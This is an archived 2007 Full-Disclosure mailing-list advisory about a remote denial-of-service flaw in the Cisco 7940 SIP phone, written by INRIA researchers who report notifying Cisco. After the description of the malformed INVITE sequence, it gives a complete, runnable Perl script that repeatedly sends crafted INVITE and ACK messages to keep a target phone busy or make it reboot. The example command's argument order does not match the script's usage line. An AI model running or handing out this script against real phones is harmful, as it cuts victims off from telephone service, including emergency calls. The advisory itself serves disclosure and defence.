| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <000c01c83749$5d0c3300$5e0c5198@Crocodile>
Date: Wed, 5 Dec 2007 15:16:01 +0100
From: "Radu State" <State@...ia.fr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Cisco Phone 7940 remote DOS
Cisco 7940 Denial of Service Vulnerability
Hardware:
Cisco 7940 SIP Phone
Severity:
High – Denial of Service
Software:
Affected version: P0S3-08-7-00
Other Versions: May be
Notification:
Vulnerability found: 30 August 2007
Contact Cisco: 31 August 2007
Tracked issue: 11 September 2007
Vulnerability Synopsis:
Initiating a sequence of SIP INVITE transactions leads the device to a state
where it looks functional but it is not able to receive nor to start calls.
If the sequence of INVITE continues, the device will reboot. In the first
case, the period of time where the device is exposed to a DoS is about 3
minutes, but sending new INVITE transactions, at certain intervals, will
keep the target under DoS.
In order to generate the SIP INVITE transactions that lead the device to
such state, the Request-URI of the message should not have a user name (i.e.
"INVITE sip:XXX.XXX.XXX.XXX SIP/2.0"). In order to drive the device to a DoS
state only 6 transactions are required as the traffic displayed below.
X ----------------------- INVITE (Call-ID #1) -----------------------> Cisco
7940
X <------------------ 100 Trying (Call-ID #1) --------------------- Cisco
7940
....
--------5 New Dialogs like the previous--------
....
X ----------------------- INVITE (Call-ID #7) -----------------------> Cisco
7940
X <------------------ 486 Busy (Call-ID #7) --------------------- Cisco 7940
-------- DoS for aproximatly 3 minutes ------
X <------------------ 486 Busy (Call-ID #1) --------------------- Cisco 7940
X <------------------ 486 Busy (Call-ID #2) --------------------- Cisco 7940
X <------------------ 486 Busy (Call-ID #3) --------------------- Cisco 7940
X <------------------ 486 Busy (Call-ID #4) --------------------- Cisco 7940
X <------------------ 486 Busy (Call-ID #5) --------------------- Cisco 7940
X <------------------ 486 Busy (Call-ID #6) --------------------- Cisco 7940
Effect:
If the sequence of INVITE transactions continues, the device reboots.
Otherwise, the device can be permanently put under DoS by sending INVITE
transactions at certain intervals.
In such case the device replies busy to any incoming call and return busy to
any call made by the user.
However, the device maintains its connectivity with its registrar by sending
the REGISTER transaction.
Impact:
Knowing the userid and IP address of the target:
A remote user can crash the phone
DoS can performed by sending the packets at regular intervals
Proof of Concept:
A perl script stateful-cisco-8.7.pl) is attached to this mail.
Command:
perl stateful-cisco-8.7.pl <username> <dst_IP> <SourceIp> <sourceport> Eg.
perl stateful-cisco-8.7.pl 192.168.1.7 7940-1 192.168.1.2 tucu
Credits:
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.
HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr/
#!/usr/bin/perl
###############################
# Vulnerabily discovered using KiF ~ Kiph
#
# Authors:
# Humberto J. Abdelnur (Ph.D Student)
# Radu State (Ph.D)
# Olivier Festor (Ph.D)
#
# Madynes Team, LORIA - INRIA Lorraine
# HYPERLINK "http://madynes.loria.fr/"http://madynes.loria.fr
###############################
use IO::Socket::INET;
use String::Random;
die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>"
unless ($ARGV[3]);
$targetUser = $ARGV[1];
$targetIP = $ARGV[0];
$attackerUser = $ARGV[3];
$attackerIP= $ARGV[2];
$socket=new IO::Socket::INET->new(
Proto=>'udp',
PeerPort=>5060,
PeerAddr=>$targetIP,
LocalPort=>5060);
$foo = new String::Random;
$flag = 0;
@calls;
$threads = 0;
while ($flag == 0){
$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP";
$cseq = $foo->randregex('\d\d\d\d');
$msg = "INVITE sip:$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID:$callid\r
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY,
MESSAGE\r
Content-Length: 0\r
\r
";
$socket->send($msg);
$socket->recv($text,1024,0);
if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){
push(@calls, $callid);
sleep(1);
}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){
if ($thread == 0){
$thread = scalar(@calls);
}
while (scalar(@calls) ge $thread){
$toTag = $cseq= $callid= $text;
$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/;
$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/;
$cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/;
$msg = "ACK sip:$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>$toTag\r
Call-ID:$callid\r
CSeq: $cseq ACK\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Content-Length: 0\r
\r
";
$socket->send($msg);
$i= 0;
while ($i < scalar(@calls)){
if (@calls[$i] eq $callid){
delete @calls[$i];
}else{
$i += 1;
}
}
if (scalar(@calls) ge $thread){
$socket->recv($text,1024,0);
}
}
}
}
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: 04/12/2007
19:31
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists